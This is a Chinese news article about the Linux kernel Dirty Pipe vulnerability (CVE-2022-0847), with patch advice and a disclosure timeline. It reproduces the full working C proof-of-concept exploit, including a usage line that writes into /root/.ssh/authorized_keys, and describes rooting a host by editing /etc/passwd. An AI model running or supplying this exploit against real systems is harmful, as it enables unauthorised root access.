Linux 内核最新高危提权漏洞:脏管道 (Dirty Pipe)

2022-03-09 發表於 开源资讯

来自 CM4all 的安全研究员 Max Kellermann 披露了一个 Linux 内核的高危提权漏洞:脏管道 (Dirty Pipe)。漏洞编号为 CVE-2022-0847。

据介绍,此漏洞自 5.8 版本起就已存在。非 root 用户通过注入和覆盖只读文件中的数据,从而获得 root 权限。因为非特权进程可以将代码注入 root 进程。

Max 表示,“脏管道”漏洞与几年前的“脏牛”类似,所以采用了相似的名字,不过前者更容易被利用。此外,该漏洞目前已被黑客利用,研究人员建议尽快升级版本,Linux 5.16.11、5.15.25 和 5.10.102 均已修复了此漏洞。

Max 在文章中提供了漏洞 PoC。

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <[email protected]>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	 the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	 leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	 pipe_buffer without initializing its "flags", the buffer
	 will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	 PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	 pipe; this will add a reference to the page cache, but
	 since copy_page_to_iter_pipe() does not initialize the
	 "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	 will instead write into the page cache, because of the
	 PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}

据介绍,本地用户可以将自己的数据注入敏感的只读文件,消除限制或修改配置以获得更高的权限。有研究人员通过利用该漏洞修改 /etc/passwd 文件进行了举例,修改后可直接取消 root 用户的密码,然后普通用户使用 su root 命令即可获得 root 账户的访问权限。还有研究人员发现,使用 /usr/bin/su 命令删除 /tmp/sh 中的 root shell 可以更容易获取 root 权限。

最后,建议各位检查所使用的 Linux 服务器的内核版本,若是 5.8 以上的版本请尽快升级。

脏管道 (Dirty Pipe) 漏洞时间线:

  • 2022-02-20:向 Linux 内核安全团队发送错误报告、漏洞利用和补丁
  • 2022-02-21:在 Google Pixel 6 上复现错误,并向 Android 安全团队发送错误报告
  • 2022-02-21: 按照 Linus Torvalds、Willy Tarreau 和 Al Viro 的建议,将补丁发送到 LKML(不含漏洞详细信息)
  • 2022-02-23:发布包含错误修复的 Linux 稳定版本 5.16.11、5.15.25、5.10.102)
  • 2022-02-24:Google 将错误修复合并到 Android 内核
  • 2022-02-28:通知 linux-distros 邮件列表
  • 2022-03-07:公开披露

相關推薦

某国产电商 APP 利用 Android 漏洞细节曝光:内嵌提权代码、动态下发 Dex

2023-03-10

披露,国内一家互联网巨头的 APP 利用了 Android 系统漏洞提权使其难以卸载。报道称,该 APP 首先利用了多个厂商 OEM 代码中的反序列化漏洞提权,提权控制手机系统之后,该 App 即开启了一系列的违规操作,绕过隐私合规监管,

OpenSSL 发布 3.0.7 修复两个“高危”漏洞

2022-11-03

有关于受影响的服务器的统计数据。只是建议用户升级到最新版本。 CVE-2022-3602 漏洞最初被 OpenSSL 团队评估为"CRITICAL"(严重)等级——因为可能会导致 RCE,但经过测试和评估,该漏洞在 2022 年 11 月 1 日被降级为"HIGH"(高危)

Spring 框架存在高危 RCE 零日漏洞,请马上升级!

2022-03-31

稿时间,Spring 团队没有对该漏洞发表任何官方公告:的最新漏洞公告是 和 ,但这两个漏洞的严重程度都是中等,无法与网传 Spring 核心框架的 RCE 高危程度相比。

openLooKeng 开源社区 Apache Log4j2 高危安全漏洞居然还未修复,建议用户不要升级

2021-12-16

plugin并不依赖log4j 【openLooKeng社区修复方案】 升级至最新组件:log4j-2.15.0,其中2.15.0的发布时间应该为2021-12-09 23:46的版本! ◎ 方案1 - 修改代码 针对ES connector 和Ranger plugin,更新代码,移除log4j的依赖。关联PR如下 :

84% 的代码库至少包含一个已知的开源漏洞

2023-02-25

应用安全公司 Synopsys 最新发布的 2023 年开源安全和风险分析 (Open Source Security and Risk Analysis,OSSRA) 报告指出,绝大多数代码库 (84%) 至少包含一个已知的开源漏洞,相较去年增加了近 4%。 2023 OSSRA 报告基于对并购交易中涉及

Ruby 3.1.3、3.0.5、2.1.7 发布,修复高危漏洞

2022-11-25

Ruby 3.1.3、3.0.5、2.1.7 发布了,这几个版本都只包含一个安全修复程序,修复了同一个漏洞: CVE-2021-33621:CGI 中的 HTTP 响应拆分 如果应用程序使用带有不受信任的用户输入的 cgi gem 生成 HTTP 响应,则攻击者可以利用它来注入

Apache HTTP Server 多个漏洞风险通告 严重漏洞影响上亿个网站

2021-12-24

对此,360CERT建议广大用户及时将Apache HTTP Server升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。 风险等级 360CERT 对该漏洞的评定结果如下 评定方式等级威胁等级高危影响面广泛攻击者

积木报表 JimuReport v1.6.2-GA2 版本发布 — 高危 SQL 漏洞安全加固版本

2023-09-13

ifactId> <version>1.6.2-GA2</version> </dependency> 最新依赖还未上传 maven 官仓,下载失败请先配置 JEECG 的 Maven 私服。 #升级日志 #升级权限内容:通过以下几个维度保障报表安全 1、增加低代码开发模式配置 jeecg.jm

curl 8.4.0 正式发布,修复 SOCKS5 堆溢出漏洞,建议升级

2023-10-12

nberg(社区称号 bagder)已提前一周预告了该版本——修复高危安全漏洞,并称该漏洞可能是很长一段时间以来 curl 遇到的最严重漏洞,同时影响到 libcurl 库和 curl 工具。 根据介绍,这个高危漏洞是 SOCKS5 堆溢出漏洞 (heap buf

研究发现 300% 的应用程序存在漏洞

2021-11-18

Synopsys 最新发布了一份“2021 Software Vulnerability Snapshot”研究报告,基于对 2600 个软件或系统目标进行的 3900 次测试。其中,83% 的测试目标是 Web 应用程序或系统、12% 是移动应用程序、其余为源代码或网络系统/应用。参与测试的

统信 UOS:各版本均不受 liblzma/xz 影响

2024-04-02

使用,因此此安全漏洞的影响面较广。 漏洞危害等级:高危。 漏洞影响范围:5.6.0<=xz-utils<=5.6.1。 统信UOS操作系统受影响情况分析: 统信UOS桌面操作系统1060版本上xz-utils的版本为5.2.4.1-1+dde,不在漏洞影响范围内,

deepin(深度)操作系统各版本均不受 liblzma/xz 影响

2024-04-09

使用,因此此安全漏洞的影响面较广。 漏洞危害等级:高危。 漏洞影响范围:5.6.0<=xz-utils<=5.6.1。   deepin(深度)操作系统受影响情况分析 deepin V23 上 xz-utils 的版本为 5.4.5,不在漏洞影响范围内,不受该漏

冰盾 · 主动防御 3.3 版本发布,功能遥遥领先

2023-10-18

也非常适用于云服务器。 冰盾完全采用微软推荐的标准内核API实现功能,兼容性好,可以跟其他的安全软件很好并存。 版本更新说明(3.3.0) 首页概况 添加 “增强防御” 功能 规则模板 添加磁盘命令监控事

Linux 6.3 中的 Nouveau 驱动程序漏洞已被处理

2023-06-18

Linux 6.3是最新的稳定内核版本,于2023年4月23日发布。然而,这个版本中却隐藏着一个可能非常严重的漏洞,它影响了开源的NVIDIA显卡驱动程序Nouveau。 这个漏洞是一个使用后释放(use-after-free)的问题,它可能导致内核内存损坏

熱門推薦